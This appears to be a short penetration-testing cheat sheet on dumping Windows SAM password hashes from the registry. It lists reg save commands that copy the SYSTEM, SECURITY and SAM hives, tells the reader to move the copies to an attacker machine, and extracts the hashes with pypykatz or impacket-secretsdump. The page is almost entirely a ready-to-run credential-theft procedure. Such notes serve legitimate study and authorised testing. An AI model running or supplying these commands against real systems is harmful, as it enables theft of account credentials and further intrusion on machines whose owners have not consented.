Dump SAM Hashes via Registry
Assume you are already have NT SYSTEM or Administrator access on system. Or, you have Backup Operator role.
reg save hklm\system system.oscp
reg save hklm\security security.oscp
reg save hklm\sam sam.oscpDownload the file to attacker machine, and get the hash value using pypykayz.
pypykatz registry system.oscp --sam sam.oscp --security security.oscpOr use secretsdump.
impacket-secretsdump -sam sam.oscp -security security.oscp -system system.oscp LOCALLast updated
Was this helpful?